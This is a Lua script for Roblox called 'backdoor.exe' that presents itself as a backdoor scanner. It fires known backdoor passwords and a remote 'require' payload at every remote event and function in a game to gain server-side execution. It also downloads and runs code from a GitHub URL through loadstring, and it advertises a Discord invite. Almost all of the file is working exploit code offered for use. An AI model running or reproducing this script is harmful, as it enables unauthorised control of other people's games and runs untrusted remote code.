--[[ backdoor.exe, the best backdoor scanner in Roblox. Copyright (C) 2021 iK4oS This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ]] local LocalPlayer = game:GetService("Players").LocalPlayer local requireScript = ("require(7924358164):k4scripts('%s')"):format(LocalPlayer.Name) local invCode = "6HndYgC" local alternativeSS = { run = { [1] = "5#lGIERKWEF" }, emma = { [1] = "pwojr8hoc0-gr0yxohlgp-0feb7ncxed", [2] = ",,,,,,,,,,,,,,," }, helpme = { [1] = "helpme" }, pickett = { [1] = "cGlja2V0dA==" }, harked = "https://raw.githubusercontent.com/iK4oS/backdoor.exe/indev/harkedSS.lua" } local function notify(text) game:GetService("StarterGui"):SetCore( "SendNotification", { Title = "backdoor.exe", Duration = 3, Text = text } ) end local function attached(possibleWait) if possibleWait then wait(possibleWait) end return LocalPlayer.PlayerGui:FindFirstChild("backdoor.exe") end local function validRemote(rm, _className) local fullName = rm:GetFullName() if string.find(fullName, "DefaultChat") then return false end if string.find(fullName, LocalPlayer.Name) then return false end if rm:FindFirstChild("__FUNCTION") then return false end if rm.Parent == game:GetService("JointsService") then return false end if rm.ClassName ~= _className then return false end if getgenv().blacklisted then if table.find(getgenv().blacklisted, fullName) then return false end end return true end local function harked() local backpack = LocalPlayer.Backpack return backpack:FindFirstChild("HandlessSegway") and Backpack.HandlessSegway:FindFirstChild("RemoteEvents") and Backpack.HandlessSegway.RemoteEvents:FindFirstChild("DestroySegway") end local function emmaBackdoor(rm) return rm.Name == "emma" and rm.Parent.Name == "mynameemma" end local function runBackdoor(rm) return rm.Name == "Run" and rm.Parent:FindFirstChild("Pages") and rm.Parent:FindFirstChild("R6") and rm.Parent:FindFirstChild("Version") and rm.Parent:FindFirstChild("Title") end local function scanGame() notify("Scanning for a backdoor.") if harked() then loadstring(game:HttpGetAsync(alternativeSS.harked))() return end for _, remote in pairs(game:GetDescendants()) do if validRemote(remote, "RemoteEvent") and not attached() then if emmaBackdoor(remote) then remote:FireServer(unpack(alternativeSS.emma), requireScript) end if runBackdoor(remote) then remote:FireServer(unpack(alternativeSS.run), requireScript) end remote:FireServer(unpack(alternativeSS.helpme), requireScript) remote:FireServer(unpack(alternativeSS.pickett), requireScript) remote:FireServer(requireScript) end end for _, remote in pairs(game:GetDescendants()) do if validRemote(remote, "RemoteFunction") and not attached() then remote:InvokeServer(requireScript) end end end local function Main() notify("Make sure to join our Discord!\nCode: "..invCode) scanGame() if not attached(2) then notify("Unable to find backdoor.\nGame not backdoored?") end end if game:IsLoaded() then pcall(Main) end -- k4scripts -- .------. -- |4.--. | -- | :│/: | -- | :│\: | -- | '--'4| -- `------'